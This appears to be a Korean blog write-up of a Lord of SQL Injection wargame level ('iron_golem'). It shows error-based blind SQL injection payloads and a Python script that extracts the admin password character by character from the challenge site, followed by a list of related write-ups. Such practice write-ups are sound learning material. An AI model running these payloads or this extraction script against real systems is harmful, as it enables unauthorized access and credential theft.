mysql error가 있으면 error을 내뿜어준다.
Error Base Blind SQL injection 문제이다.
조건문을 이용하여 error을 발생시켜보았다.
항상 참 쿼리
pw=' or id='admin' and if(1=1,1,(select 1 union select 2))%23
항상 거짓 쿼리
pw=' or id='admin' and if(1=2,1,(select 1 union select 2))%23
이것을 이용하여 파이썬 코드를 작성한다.
import requests cookies= {'PHPSESSID':'5029udlls5r1m3m52n0crur5rh'} url = 'https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?' pw = '' #pw길이 구하기 for i in range(1,99): payload = "pw=%27%20or%20id=%27admin%27%20and%20if(length(pw)={},1,(select%201%20union%20select%202))%23".format(i) new_url = url+payload res = requests.get(new_url, cookies=cookies) res.raise_for_status() if "Subquery returns more than 1 row" not in res.text: length = i break print("pw length : " +str(length)) # pw 구하기 for i in range(1,length+1): for j in range(33,127): payload = "pw=%27%20or%20if((select%20id=%27admin%27%20and%20ord(substr(pw,{},1))={}),1,(select%201%20union%20select%202))%23".format(i, j) new_url = url+payload res = requests.get(new_url, cookies=cookies) res.raise_for_status() if "Subquery returns more than 1 row" not in res.text: pw += chr(j) print("pw: "+pw) break print ("pw : "+pw)
pw가 32글자나 되어서 오래걸렸다..
'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글
| [Lord of SQL Injection] 23번 hell_fire (0) | 2021.01.23 |
|---|---|
| [Lord of SQL Injection] 22번 dark_eyes (0) | 2021.01.22 |
| [Lord of SQL Injection] 20번 dragon (0) | 2021.01.22 |
| [Lord of SQL Injection] 19번 xavis (0) | 2021.01.22 |
| [Lord of SQL Injection] 18번 nightmare (0) | 2021.01.22 |
